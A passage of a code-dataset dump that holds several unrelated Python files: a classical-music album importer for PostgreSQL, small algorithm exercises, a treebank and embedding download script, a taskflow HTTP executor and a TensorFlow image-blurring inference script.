1\n\n\n\n","repo_name":"UWPCE-PythonCert-ClassRepos/Sp2018-Online","sub_path":"students/kenneth_murray/Lesson1/Generator/generator_solution.py","file_name":"generator_solution.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3834480217","text":"# USAGE:\n# python3 store_album.py relative/path/to/file.json\n# TODO: add aggressive validation everywhere to make sure bad data never makes\n# its way into the database\n\nimport psycopg2\nimport json\nimport sys\nfrom datetime import datetime\n\n\ndef parse_data_from_file():\n \"\"\"\n Parse JSON from file specified in CLI into dictionary\n\n Returns:\n dict -- album data\n \"\"\"\n # get filename from CLI\n filename = sys.argv[1]\n\n # load JSON from file\n with open(filename) as data_file:\n data = json.load(data_file)\n\n return data\n\n\ndef construct_date_tuple(fuzzy_date):\n \"\"\"\n Construct valid YYYY-MM-DD date string, as well as accuracy string\n from fuzzy date string.\n\n Why? So that we can still use the \"DATE\" type in the database, but\n preserving the disctinction between 2016-01-01 where we actually only\n know the year (2017), as compared to 2017-01-01 where we actually know\n that is is exactly January 1, 2017.\n\n Arguments:\n fuzzy_date {string} -- date in the following possible formats:\n YYYY-MM-DD, YYYY-MM, YYYY\n\n Returns:\n date + accuracy {tuple(str, str)} -- eg. ('2015-04-28', 'exact date')\n first element is a date string in YYYY-MM-DD format\n second element is a string of the these possible values:\n \"exact date\" - year, month, and day are all exact\n \"month\" - only year and month are accurate\n \"year\" - only year is accurate\n \"\"\"\n for char in fuzzy_date:\n assert(char == '-' or char.isdigit())\n\n components = fuzzy_date.split('-')\n\n if len(components) == 3:\n return (fuzzy_date, 'exact date')\n\n elif len(components) == 2:\n return (\n datetime.strptime(fuzzy_date, '%Y-%m').strftime('%Y-%m-%d'),\n 'month'\n )\n\n else:\n return (\n datetime.strptime(fuzzy_date, '%Y').strftime('%Y-%m-%d'),\n 'year'\n )\n\n\ndef is_album_new(data, cursor):\n \"\"\"\n Determine if the album is already in the database\n\n Unique identifiers for an album:\n label name + catalog\n label name + album title + release_date (if catalog is missing)\n label name + album title (if catalog AND release_date are both missing)\n\n 'Label' is required.\n\n Args:\n data: dictionary of JSON data\n cursor: database cursor, coming from psycopg2\n\n Returns:\n boolean - True if album is new, False if album is already in DB\n \"\"\"\n # uniquely identify an album by label name + catalog\n if 'catalog' in data['album']:\n cursor.execute(\"\"\"\n SELECT a_l.id FROM albums_labels a_l\n JOIN label label\n ON label.id = a_l.fk_label_id\n WHERE label.name = %s\n AND a_l.catalog = %s\n \"\"\", (data['album']['label'], data['album']['catalog']))\n\n # uniquely identify an album by\n # label name + album title + release_date (if catalog is missing)\n elif 'release_date' in data['album']:\n release_date, release_date_accuracy = construct_date_tuple(\n data['album']['release_date'])\n\n cursor.execute(\"\"\"\n SELECT a_l.id FROM albums_labels a_l\n JOIN label label\n ON label.id = a_l.fk_label_id\n JOIN album album\n ON album.id = a_l.fk_album_id\n WHERE label.name = %s\n AND album.title = %s\n AND release_date = %s\n AND release_date_accuracy = %s\n \"\"\", (\n data['album']['label'],\n data['album']['title'],\n release_date,\n release_date_accuracy\n ))\n\n # uniquely identify an album by\n # label name + album title (if catalog AND release_date are both missing)\n else:\n cursor.execute(\"\"\"\n SELECT a_l.id FROM albums_labels a_l\n JOIN label label\n ON label.id = a_l.fk_label_id\n JOIN album album\n ON album.id = a_l.fk_album_id\n WHERE label.name = %s\n AND album.title = %s\n \"\"\", (\n data['album']['label'],\n data['album']['title']\n ))\n\n return not bool(cursor.fetchone())\n\n\ndef process_album(data, cursor):\n label_id = add_label_and_get_id(data, cursor)\n album_id = add_album_and_get_id(data, label_id, cursor)\n add_discs(data, album_id, cursor)\n\n persons_subm_to_db_id_map = add_persons(data, cursor)\n add_compositions(data, persons_subm_to_db_id_map, cursor)\n\n # add_recordings(data, cursor)\n # add_tracks(data, cursor)\n\n\ndef add_label_and_get_id(data, cursor):\n \"\"\"if label already exists, get label id, otherwise insert and get label id\n \"\"\"\n cursor.execute(\"SELECT id FROM label WHERE name = %s\",\n (data['album']['label'],))\n try:\n label_id = cursor.fetchone()[0]\n except TypeError:\n cursor.execute(\"INSERT INTO label (name) VALUES (%s) RETURNING id\",\n (data['album']['label'],))\n label_id = cursor.fetchone()[0]\n return label_id\n\n\ndef add_album_and_get_id(data, label_id, cursor):\n \"\"\"adds a new album, and returns its ID\"\"\"\n\n # Construct optional release_date and release_date_accuracy values\n date = None\n accuracy = None\n if 'release_date' in data['album']:\n date, accuracy = construct_date_tuple(data['album']['release_date'])\n cursor.execute(\"\"\"\n INSERT INTO album (title, release_date, release_date_accuracy,\n total_discs, media) VALUES (%s, %s, %s, %s, %s)\n RETURNING id\n \"\"\", (\n data['album']['title'],\n date,\n accuracy,\n data['album']['total_discs'],\n data['album']['media']\n ))\n album_id = cursor.fetchone()[0]\n cursor.execute(\"\"\"\n INSERT INTO albums_labels (fk_album_id, fk_label_id, catalog)\n VALUES (%s, %s, %s)\n \"\"\", (album_id, label_id, data['album']['catalog']))\n return album_id\n\n\ndef add_discs(data, album_id, cursor):\n \"\"\"add discs to DB\"\"\"\n total_discs = data['album']['total_discs']\n discs = data['discs']\n for disc_num in range(1, total_discs+1):\n total_tracks = discs[str(disc_num)]['total_tracks']\n cursor.execute(\"\"\"\n INSERT INTO disc (fk_album_id, disc_num, total_tracks)\n VALUES (%s, %s, %s)\n \"\"\", (album_id, disc_num, total_tracks))\n\n\ndef add_persons(data, cursor):\n \"\"\" Add persons to database \"\"\"\n persons_subm_to_db_id_map = {}\n persons = data.get('persons')\n for subm_id, person in persons.items():\n persons_subm_to_db_id_map[subm_id] = add_person(person, cursor)\n return persons_subm_to_db_id_map\n\n\ndef add_person(person, cursor):\n \"\"\" get person id, and if not already in DB, add person to the DB\n \"\"\"\n cursor.execute(\"\"\"\n SELECT id FROM person (name_last, name_first_plus, group_name)\n WHERE name_last = %s\n AND name_first_plus = %s\n AND group_name = %s\n \"\"\", (\n person.get('name_last'),\n person.get('name_first_plus'),\n person.get('group_name'))\n )\n\n try:\n person_id = cursor.fetchone()[0]\n except TypeError:\n cursor.execute(\"\"\"\n INSERT INTO person (name_last, name_first_plus, group_name)\n VALUES (%s, %s, %s)\n RETURNING id\n \"\"\", (\n person.get('name_last'),\n person.get('name_first_plus'),\n person.get('group_name')\n ))\n person_id = cursor.fetchone()[0]\n return person_id\n\n\ndef add_compositions(data, persons_subm_to_db_id_map, cursor):\n \"\"\" Add compositions to database \"\"\"\n compositions = data.get('compositions')\n for key, composition in compositions.items():\n add_composition(data, composition, persons_subm_to_db_id_map, cursor)\n\n\ndef add_composition(data, composition, persons_subm_to_db_id_map, cursor):\n \"\"\" Add composition to database\n #\n # Unhandled cases (for now, at least):\n # - Anything that doesn't have enough data to be matched using above\n # uniqueness definitions, such as:\n # - Anonymous Composers\n # - No Title\n # - Atonal music that is unpublished without catalog number\n # - Derivative works of any kind (where person is not \"Composer\")\n \"\"\"\n title = composition.get('title')\n movements = composition.get('movements')\n total_movements = len(movements) if movements else 1\n\n # Get composer_db_id\n # TODO: abstract into separate method\n # TODO: support more than just \"composer\" person related to composition,\n # should also support 'arranger', 'transcriber', etc... (other valid\n # \"composer-like\" roles)\n persons = composition.get('persons')\n composer_submission_id = next(\n (p.submission_id for p in persons if p['type'] == 'composer'), None)\n composer_db_id = persons_subm_to_db_id_map.get(composer_submission_id)\n\n catalogs = composition.get('catalogs')\n if catalogs:\n first_catalog = catalogs[0]\n catalog_type = first_catalog.get('catalog_type')\n catalog_num = first_catalog.get('catalog_num')\n catalog_sub_num = first_catalog.get('catalog_sub_num')\n\n # Unique Identifier of a Composition\n # Version 1 - Composition with Catalog Info\n # Composition Persons (i.e. Composer(s), Arranger(s), etc.)\n # Title\n # Total # of Movements\n # Catalog (just the first one is enough)\n cursor.execute(\"\"\"\n SELECT (id) from composition as composition\n JOIN compositions_persons as person\n ON composition.id = compositions_persons.fk_composition_id\n JOIN person as person\n ON person.id = compositions_persons.fk_person_id\n JOIN person_role as person_role\n ON person_role.id = compositions_persons.fk_person_role_id\n JOIN catalog as catalog\n ON composition.id = fk_composition_id\n WHERE person_role.type = 'composer'\n AND person.id = %s\n AND composition.title = %s\n AND composition.total_mvmts = %s\n AND catalog.catalog_type = %s\n AND catalog.catalog_num = %s\n AND catalog.catalog_sub_num = %s\n \"\"\", (\n composer_db_id,\n title,\n total_movements,\n catalog_type,\n catalog_num,\n catalog_sub_num)\n )\n composition_id = cursor.fetchone()[0]\n\n else:\n # Unique Identifier of a Composition\n # Version 2 - Composition Lacking Catalog Info\n # Composition Persons (i.e. Composer(s), Arranger(s), etc.)\n # Title\n # Total # of Movements\n # Key (or mode)\n #\n # Date of Composition (if date range, choose earliest date)\n # AND / OR\n # First Publication Date (if date range, choose earliest date)\n pass\n\n # If no composition is found, insert all the data and return the\n # composition_id\n #\n # insert composition table row, returning composition_id\n # for person in persons:\n # add_composition_person(data, person, composition_id)\n\n # for catalog in catalogs:\n # add_catalog(catalog, composition_id)\n\n # for movement in movements:\n # add_movement(movement, composition_id)\n\n\ndef add_catalog(data, cursor):\n pass\n\n\ndef add_movements(data, cursor):\n pass\n\n\ndef add_recordings(data, cursor):\n pass\n\n\ndef add_tracks(data, cursor):\n pass\n\n\ndef main():\n # open connection and fetch cursor to database\n connection = psycopg2.connect('dbname=classicast user=postgres')\n cursor = connection.cursor()\n\n data = parse_data_from_file()\n\n try:\n if is_album_new(data, cursor):\n process_album(data, cursor)\n\n # Make the changes to the database persistent\n connection.commit()\n else:\n print('This album already exists in the system!' +\n ' Please edit the existing data.')\n except Exception as exception_instance:\n # rollback any changes if error is encountered in the process of adding\n # album information to the database\n connection.rollback()\n raise exception_instance\n finally:\n # Close communication with the database\n cursor.close()\n connection.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"classicast/masseur","sub_path":"store_album.py","file_name":"store_album.py","file_ext":"py","file_size_in_byte":12430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44461980707","text":"from typing import List\nfrom functools import reduce\ndef productExceptSelf(nums: List[int]) -> List[int]:\n out = []\n p = 1\n for i in range(0, len(nums)):\n out.append(p)\n p = p*nums[i]\n p=1\n for i in range(len(nums)-1, 0-1, -1):\n out[i] = out[i]* p\n p = p * nums[i]\n return out\n\nif __name__ == \"__main__\":\n nums = [1,2,3,4]\n print(productExceptSelf(nums))","repo_name":"joohyun333/programmers","sub_path":"LeetCode/product-of-array-except-self.py","file_name":"product-of-array-except-self.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30351104041","text":"\nname = '郑爽'\n\ndef fn():\n print('-- fn --')\n\n\n# print(globals())\nprint('__name__: ', __name__)\n\n# 1.作为代码运行的入口\n# 2.作为内部测试代码使用\n# a.如果是直接运行当前文件,则进入if, __name__ == '__main__'\n# b.如果是其他模块导入了当前模块,则不进入if, __name__ == 'module'(模块名)\n\n\nif __name__ == '__main__':\n fn()\n","repo_name":"fufuzzz/note","sub_path":"Python基础/第03周/day12/code/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72434204266","text":"n, k = [int(i) for i in input().split(' ')]\n\na = [0]*n\nl,r =0,0\ntmp = 0\n\nfor i in range(n):\n a[i] = float(input())*100\n tmp += a[i]\nr = tmp//k+1\n\n\nwhile r-l > 1e-4:\n mid = (l+r)/2\n\n tmp = 0\n for i in range(n):\n tmp = tmp + a[i]//mid\n if tmp < k:\n r = mid\n else:\n l = mid\n\n\nt = int(r*1.00)/100\nprint(t)\n\n\n","repo_name":"jellier/HetaoHomeWork","sub_path":"算法练习/P1577_二分_切绳子.py","file_name":"P1577_二分_切绳子.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16588994169","text":"import sys\n\nimport optparse\nimport os\nimport logging\n\nfrom utils import download_and_extract_archive, download_file\n\n# Append parent dir to sys path.\nparent_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nos.sys.path.insert(0, parent_dir)\n\nTREEBANK_CONLL = 'https://lindat.mff.cuni.cz/repository/xmlui/bitstream/handle/11234/1-2515/ud-treebanks-v2.1.tgz?sequence=4&isAllowed=y'\nTREEBANK_LOCATION = 'corpus/ud_treebanks'\n\nTEST_DATA_CONLL = 'https://lindat.mff.cuni.cz/repository/xmlui/bitstream/handle/11234/1-2184/ud-test-v2.0-conll2017.tgz?sequence=3&isAllowed=y'\nTEST_DATA_LOCATION = 'corpus/ud_test'\n\nUD_EVAL_SCRIPT = 'https://raw.githubusercontent.com/ufal/conll2017/master/evaluation_script/conll17_ud_eval.py'\nUD_EVAL_LOCATION = 'cube/misc/conll17_ud_eval.py'\n\nEMBEDDINGS_NAME = 'wiki.{}.vec'\nFACEBOOK_EMBEDDINGS_URL = 'https://s3-us-west-1.amazonaws.com/fasttext-vectors/'\nFACEBOOK_EMBEDDINGS_LOCATION = 'corpus/'\n\nlogger = logging.getLogger(__name__)\n\n\nif __name__ == '__main__':\n parser = optparse.OptionParser()\n parser.add_option('--language', action='store', dest='language')\n (params, _) = parser.parse_args(sys.argv)\n if not params.language:\n print(\n '\\nRun the script in the following manner:\\n'\n 'python scripts/download_data.py --language ro\\n')\n sys.exit(1)\n\n # Download Treebank CONLL Universal Dependencies data.\n download_and_extract_archive(TREEBANK_CONLL, TREEBANK_LOCATION)\n\n # Download test CONLL Universal Dependencies data.\n download_and_extract_archive(TEST_DATA_CONLL, TEST_DATA_LOCATION)\n\n # Download conll17_ud_eval script\n download_file(UD_EVAL_SCRIPT, UD_EVAL_LOCATION)\n\n # Download Facebook embeddings for the provided language.\n name = EMBEDDINGS_NAME.format(params.language)\n language_url = FACEBOOK_EMBEDDINGS_URL + name\n location = FACEBOOK_EMBEDDINGS_LOCATION + name\n download_file(language_url, location)\n","repo_name":"Sreeganesh/POS_Tagging_and_Dependency_Parsing","sub_path":"scripts/download_data.py","file_name":"download_data.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43259464467","text":"def getShipCells(ship):\n res = []\n startCell, endCell = ship\n x1, y1 = startCell\n x2, y2 = endCell\n if x1 == x2:\n biggerY, smallerY = [y1, y2] if y1 > y2 else [y2, y1]\n for y in range(smallerY, biggerY + 1):\n res.append([x1, y])\n else:\n biggerX, smallerX = [x1, x2] if x1 > x2 else [x2, x1]\n for x in range(smallerX, biggerX + 1):\n res.append([x, y1])\n return res\n\n\ndef checkBattleGround(ships):\n allShipWithAllCells = list(map(getShipCells, ships))\n allShipsOnBattle = {1: 0, 2: 0, 3: 0, 4: 0, 5: 0}\n for index, mainShip in enumerate(allShipWithAllCells):\n if len(mainShip) not in allShipsOnBattle.keys():\n return False\n allShipsOnBattle[len(mainShip)] += 1\n for checkShip in allShipWithAllCells[:index] + allShipWithAllCells[index+1:]:\n for cellInMainShip in mainShip:\n for cellInCheckShip in checkShip:\n x1, y1 = cellInMainShip\n x2, y2 = cellInCheckShip\n if x1 == x2 and y1 == y2:\n return False\n if x1 - 1 <= x2 <= x1 + 1 and y1-1 <= y2 <= y1+1:\n return False\n if allShipsOnBattle[1] != 4 or allShipsOnBattle[2] != 3 or allShipsOnBattle[3] != 2 or allShipsOnBattle[4] != 1 or allShipsOnBattle[5] != 1:\n return False\n return True\n\n\nprint(checkBattleGround([\n [[1, 1], [1, 1]],\n [[1, 3], [1, 3]],\n [[1, 5], [1, 5]],\n [[1, 7], [1, 7]],\n [[1, 10], [2, 10]],\n [[4, 10], [5, 10]],\n [[7, 10], [8, 10]],\n [[10, 10], [10, 8]],\n [[10, 6], [10, 4]],\n [[10, 1], [7, 1]],\n [[3, 3], [3, 7]]\n # [[1, 3], [1, 7]] # False\n]))\n","repo_name":"ahd3r/algo","sub_path":"validate_battle_ship.py","file_name":"validate_battle_ship.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14596390209","text":"import functools\nimport time\nimport eventlet\n\nfrom simpleutil.utils import jsonutils\nfrom simpleutil.utils import importutils\nfrom simpleutil.utils import reflection\n\nfrom simpleflow.task import FunctorTask\n\nfrom goperation.taskflow import common\nfrom goperation.manager import common as manager_common\n\nfrom goperation.manager.rpc.agent.scheduler.taskflow import SchedulerTaskBase\n\nfrom goperation.manager.api import get_http\n\n\ndef safe_load(var):\n if var is None:\n return None\n return jsonutils.loads_as_bytes(var)\n\n\nclass HttpRequestExecutor(SchedulerTaskBase, FunctorTask):\n\n ECLS = object\n RCLS = object\n\n @classmethod\n def builder(cls, name, jobstep, **kwargs):\n ecls = importutils.import_class(jobstep.execute)(get_http())\n method = jobstep.method\n execute = getattr(ecls, method)\n provides = safe_load(jobstep.provides)\n rebind = safe_load(jobstep.rebind)\n revert = None\n if jobstep.revert:\n revert = importutils.import_class(jobstep.revert)(ecls, method)\n return cls(name, jobstep, execute, provides, rebind, revert, **kwargs)\n\n def __init__(self, name, jobstep, execute, provides, rebind, revert=None):\n self.jobstep = jobstep\n super(HttpRequestExecutor, self).__init__(name=name,\n execute=execute,\n rebind=rebind, provides=provides)\n self._revert = revert\n\n def revert(self, result, *args, **kwargs):\n if self._revert:\n self._revert(result)\n self.jobstep.result = common.REVERTED\n self.jobstep.resultcode = manager_common.RESULT_UNKNOWN\n\n\nclass AsyncHttpRequestExecutor(HttpRequestExecutor):\n\n def __init__(self, name, jobstep, execute, provides, rebind, revert=None,\n agents=True, details=False):\n self.jobstep = jobstep\n super(AsyncHttpRequestExecutor, self).__init__(name, jobstep, execute, provides, rebind, revert)\n self.agents = agents\n self.details = details\n\n def execute(self, *args, **kwargs):\n asyncresult = super(AsyncHttpRequestExecutor, self).execute(*args, **kwargs)['data'][0]\n finishtime = asyncresult['finishtime']\n deadline = asyncresult['deadline'] + 1\n request_id = asyncresult['request_id']\n request = functools.partial(func=getattr(reflection.get_method_self(self._execute), 'async_show'),\n request_id=request_id,\n body={'agents': self.agents, 'details': self.details})\n wait = finishtime - int(time.time())\n if wait < 0:\n wait = 0\n eventlet.sleep(wait)\n not_overtime = 2\n while True:\n aynecresult = request()['data'][0]\n if aynecresult['status'] == manager_common.FINISH:\n return aynecresult\n if int(time.time()) > deadline:\n not_overtime -= 1\n if not not_overtime:\n raise\n eventlet.sleep(1)\n\n\nclass RpcCastRequestExecutor(SchedulerTaskBase, FunctorTask):\n pass\n\n\nclass RpcCallRequestExecutor(RpcCastRequestExecutor):\n pass\n","repo_name":"lolizeppelin/Goperation","sub_path":"goperation/manager/rpc/agent/scheduler/taskflow/executor.py","file_name":"executor.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"13231336096","text":"# bfs 풀이\nfrom collections import deque\n\nn, m = map(int, input().split())\n\ngraph = []\nfor _ in range(n):\n graph.append(input())\n\nvisited = [[False]*m for i in range(n)]\n\nanswer = 0\nfor i in range(n):\n for j in range(m):\n if graph[i][j] == '0' and not visited[i][j]:\n queue = deque()\n queue.append((i, j))\n visited[i][j] = True\n while queue:\n curr = queue.popleft()\n dir = [(1, 0), (-1, 0), (0, 1), (0, -1)] \n for d in dir:\n r = curr[0] + d[0]\n c = curr[1] + d[1]\n if r>=0 and r= 0 and rf[raw_ds].max() <= 1\n ), \"Raw values are float but not in [0,1], I don't know how to normalize. Please provide a factor.\"\n factor = 1.0\n else:\n raise ValueError(\n \"don't know which factor to assume for data of type {0:}\".format(\n rf[raw_ds].dtype\n )\n )\n\n if min_sc is None or max_sc is None:\n try:\n if min_sc is None:\n min_sc = rf[raw_ds].attrs[\"contrastAdjustment\"][\"min\"]\n if max_sc is None:\n max_sc = rf[raw_ds].attrs[\"contrastAdjustment\"][\"max\"]\n except KeyError:\n min_sc = 0.0\n max_sc = factor\n logging.warning(\n \"min_sc and max_sc not specified and contrastAdjustment not found in attributes of {0:}, will continue \"\n \"with default contrast (min {1:}, max{2:}\".format(\n os.path.join(rf, raw_ds), min_sc, max_sc\n )\n )\n\n scale = (factor / (float(max_sc) - float(min_sc))) * 2.0\n shift = -scale * (float(min_sc) / factor) - 1\n\n return factor, scale, shift\n\n\ndef prepare_cell_inference(\n n_jobs,\n raw_data_path,\n dataset_id,\n sigma,\n raw_ds,\n setup_path,\n output_path,\n factor,\n min_sc,\n max_sc,\n float_range,\n safe_scale,\n n_cpus,\n finish_interrupted,\n):\n # assert os.path.exists(setup_path), \"Path to experiment directory does not exist\"\n # sys.path.append(setup_path)\n # import unet_template\n if raw_data_path.endswith(\"/\"):\n raw_data_path = raw_data_path[:-1]\n assert os.path.exists(\n raw_data_path\n ), \"Path to N5 dataset with raw data and mask does not exist\"\n # assert os.path.exists(os.path.join(setup_path, \"blur.meta\"))\n rf = zarr.open(raw_data_path, mode=\"r\")\n assert raw_ds in rf, \"Raw data not present in N5 dataset\"\n shape_vc = rf[raw_ds].shape\n\n output_dir, out_file = get_output_paths(raw_data_path, setup_path, output_path)\n\n if not finish_interrupted:\n names = blur_tf(size, sigma)\n input_shape_vc = Coordinate(size)\n\n output_shape_wc = Coordinate(size) * voxel_size\n output_shape_vc = Coordinate(size)\n chunk_shape_vc = Coordinate(size)\n chunk_shape_wc = output_shape_wc\n\n full_shape_wc = Coordinate(shape_vc) * voxel_size\n full_shape_vc_output = Coordinate(shape_vc)\n\n # offset file, e.g. \"(...)/setup01/HeLa_Cell2_4x4x4nm/offsets_volumes_masks_foreground_shape180x180x180.json\"\n offset_filename = \"offsets_{0:}_shape{1:}x{2:}x{3:}.json\".format(\n mask_ds.replace(\"/\", \"_\"), *output_shape_wc\n )\n offset_file = os.path.join(output_dir, offset_filename)\n\n # prepare datasets\n factor, scale, shift = get_contrast_adjustment(\n rf, raw_ds, factor, min_sc, max_sc\n )\n\n f = zarr.open(out_file)\n dataset_target_keys = [\"raw_blurred\"]\n for dstk in dataset_target_keys:\n if dstk not in f:\n ds = f.empty(\n name=dstk,\n shape=full_shape_vc_output,\n compressor=numcodecs.GZip(6),\n dtype=\"uint8\",\n chunks=chunk_shape_vc,\n )\n else:\n ds = f[dstk]\n ds.attrs[\"resolution\"] = tuple(voxel_size)[::-1]\n ds.attrs[\"offset\"] = (0, 0, 0)\n ds.attrs[\"raw_data_path\"] = raw_data_path\n ds.attrs[\"raw_ds\"] = raw_ds\n ds.attrs[\"parent_dataset_id\"] = dataset_id\n ds.attrs[\"sigma\"] = sigma\n ds.attrs[\"raw_scale\"] = scale\n ds.attrs[\"raw_shift\"] = shift\n ds.attrs[\"raw_normalize_factor\"] = factor\n ds.attrs[\"float_range\"] = float_range\n ds.attrs[\"safe_scale\"] = safe_scale\n\n if not os.path.exists(offset_file):\n generate_full_list(offset_file, output_shape_wc, raw_data_path, raw_ds)\n shapes_file = os.path.join(\n setup_path, \"shapes_steps_{0:}x{1:}x{2:}.json\".format(*size)\n )\n if not os.path.exists(shapes_file):\n shapes = {\n \"input_shape_vc\": tuple(int(isv) for isv in input_shape_vc),\n \"output_shape_vc\": tuple(int(osv) for osv in output_shape_vc),\n \"chunk_shape_vc\": tuple(int(csv) for csv in chunk_shape_vc),\n }\n with open(shapes_file, \"w\") as f:\n json.dump(shapes, f)\n\n p_proc = re.compile(\"list_gpu_\\d+_\\S+_processed.txt\")\n print(any([p_proc.match(f) is not None for f in os.listdir(out_file)]))\n if any([p_proc.match(f) is not None for f in os.listdir(out_file)]):\n print(\"Redistributing offset lists over {0:} jobs\".format(n_jobs))\n redistribute_offset_lists(list(range(n_jobs)), out_file)\n else:\n with open(offset_file, \"r\") as f:\n offset_list = json.load(f)\n offset_list_from_precomputed(offset_list, list(range(n_jobs)), out_file)\n return input_shape_vc, output_shape_vc, chunk_shape_vc\n\n\ndef preprocess(data, scale=2, shift=-1.0, factor=None):\n return clip(scale_shift(normalize(data, factor=factor), scale, shift))\n\n\ndef single_job_inference(\n job_no,\n raw_data_path,\n sigma,\n raw_ds,\n setup_path,\n output_path=None,\n factor=None,\n min_sc=None,\n max_sc=None,\n float_range=(-1, 1),\n safe_scale=False,\n n_cpus=5,\n):\n\n output_dir, out_file = get_output_paths(raw_data_path, setup_path, output_path)\n offset_file = os.path.join(out_file, \"list_gpu_{0:}.json\".format(job_no))\n if not os.path.exists(offset_file):\n return\n\n with open(offset_file, \"r\") as f:\n offset_list = json.load(f)\n\n rf = zarr.open(raw_data_path, mode=\"r\")\n shape_vc = rf[raw_ds].shape\n weight_meta_graph = os.path.join(setup_path, \"blur_{0:}\".format(float(sigma)))\n inference_meta_graph = os.path.join(setup_path, \"blur_{0:}\".format(float(sigma)))\n\n net_io_json = os.path.join(setup_path, \"net_io_names.json\")\n with open(net_io_json, \"r\") as f:\n net_io_names = json.load(f)\n\n shapes_file = os.path.join(\n setup_path, \"shapes_steps_{0:}x{1:}x{2:}.json\".format(*size)\n )\n with open(shapes_file, \"r\") as f:\n shapes = json.load(f)\n input_shape_vc, output_shape_vc, chunk_shape_vc = (\n shapes[\"input_shape_vc\"],\n shapes[\"output_shape_vc\"],\n shapes[\"chunk_shape_vc\"],\n )\n\n input_key = net_io_names[\"raw_input\"]\n network_output_keys = net_io_names[\"output\"]\n dataset_target_keys = [\"raw_blurred\"]\n\n input_shape_wc = Coordinate(input_shape_vc) * voxel_size\n output_shape_wc = Coordinate(output_shape_vc) * voxel_size\n chunk_shape_wc = Coordinate(chunk_shape_vc) * voxel_size\n\n prediction = TensorflowPredict(\n weight_meta_graph,\n inference_meta_graph,\n input_keys=input_key,\n output_keys=network_output_keys,\n has_trained_variables=False,\n )\n\n t_predict = time.time()\n\n factor, scale, shift = get_contrast_adjustment(rf, raw_ds, factor, min_sc, max_sc)\n\n run_inference_zarr_multi_crop(\n prediction,\n functools.partial(preprocess, factor=1.0 / factor, scale=scale, shift=shift),\n functools.partial(\n clip_float_to_uint8, float_range=float_range, safe_scale=safe_scale\n ),\n raw_data_path,\n out_file,\n offset_list,\n network_input_shapes_wc=[\n input_shape_wc,\n ],\n network_output_shape_wc=output_shape_wc,\n chunk_shape_wc=chunk_shape_wc,\n input_keys=[\n raw_ds,\n ],\n target_keys=dataset_target_keys,\n input_resolutions=[\n tuple(voxel_size),\n ],\n target_resolutions=[\n tuple(voxel_size),\n ]\n * len(dataset_target_keys),\n log_processed=os.path.join(\n os.path.dirname(offset_file),\n \"list_gpu_{0:}_{1:}_processed.txt\".format(job_no, sigma),\n ),\n pad_value=int(round(-factor * (shift / scale))),\n num_cpus=n_cpus,\n )\n\n t_predict = time.time() - t_predict\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"action\", type=str, choices=(\"prepare\", \"inference\"))\n parser.add_argument(\"n_job\", type=int)\n parser.add_argument(\"n_cpus\", type=int)\n parser.add_argument(\"dataset_id\", type=str)\n parser.add_argument(\"sigma\", type=float)\n parser.add_argument(\"--raw_data_path\", type=str, default=\"None\")\n parser.add_argument(\"--raw_ds\", type=str, default=\"volumes/raw/s0\")\n parser.add_argument(\"--mask_ds\", type=str, default=\"volumes/masks/foreground\")\n parser.add_argument(\"--setup_path\", type=str, default=\".\")\n parser.add_argument(\"--output_path\", type=str, default=None)\n parser.add_argument(\"--finish_interrupted\", type=bool, default=False)\n parser.add_argument(\"--factor\", type=int, default=None)\n parser.add_argument(\"--min_sc\", type=float, default=None)\n parser.add_argument(\"--max_sc\", type=float, default=None)\n parser.add_argument(\"--float_range\", type=int, nargs=\"+\", default=(-1, 1))\n parser.add_argument(\"--safe_scale\", type=bool, default=False)\n args = parser.parse_args()\n print(args)\n action = args.action\n dataset_id = args.dataset_id\n if args.raw_data_path == \"None\":\n raw_data_path = os.path.join(\n config_loader.get_config()[\"organelles\"][\"data_path\"],\n dataset_id,\n dataset_id + \".n5\",\n )\n else:\n raw_data_path = args.raw_data_path\n assert os.path.exists(raw_data_path), \"Path {raw_data:} does not exist\".format(\n raw_data=raw_data_path\n )\n output_path = args.output_path\n sigma = args.sigma\n n_job = args.n_job\n n_cpus = args.n_cpus\n raw_ds = args.raw_ds\n if args.mask_ds == \"None\":\n mask_ds = None\n else:\n mask_ds = args.mask_ds\n setup_path = args.setup_path\n factor = args.factor\n min_sc = args.min_sc\n max_sc = args.max_sc\n float_range = tuple(args.float_range)\n assert len(float_range) == 2\n safe_scale = args.safe_scale\n finish_interrupted = args.finish_interrupted\n if action == \"prepare\":\n prepare_cell_inference(\n n_job,\n raw_data_path,\n dataset_id,\n sigma,\n raw_ds,\n setup_path,\n output_path,\n factor,\n min_sc,\n max_sc,\n float_range,\n safe_scale,\n n_cpus,\n finish_interrupted,\n )\n # elif action == \"run\":\n # input_shape_vc, output_shape_vc, chunk_shape_vc = prepare_cell_inference(n_job, raw_data_path, iteration,\n # raw_ds, mask_ds, setup_path, factor,\n # min_sc, max_sc, finish_interrupted)\n # submit_jobs(n_job, input_shape_vc, output_shape_vc, chunk_shape_vc, raw_data_path, iteration, raw_ds,\n # setup_path, factor=factor, min_sc=min_sc, max_sc=max_sc)\n\n elif action == \"inference\":\n single_job_inference(\n n_job,\n raw_data_path,\n sigma,\n raw_ds,\n setup_path,\n output_path=output_path,\n factor=factor,\n min_sc=min_sc,\n max_sc=max_sc,\n float_range=float_range,\n safe_scale=safe_scale,\n n_cpus=n_cpus,\n 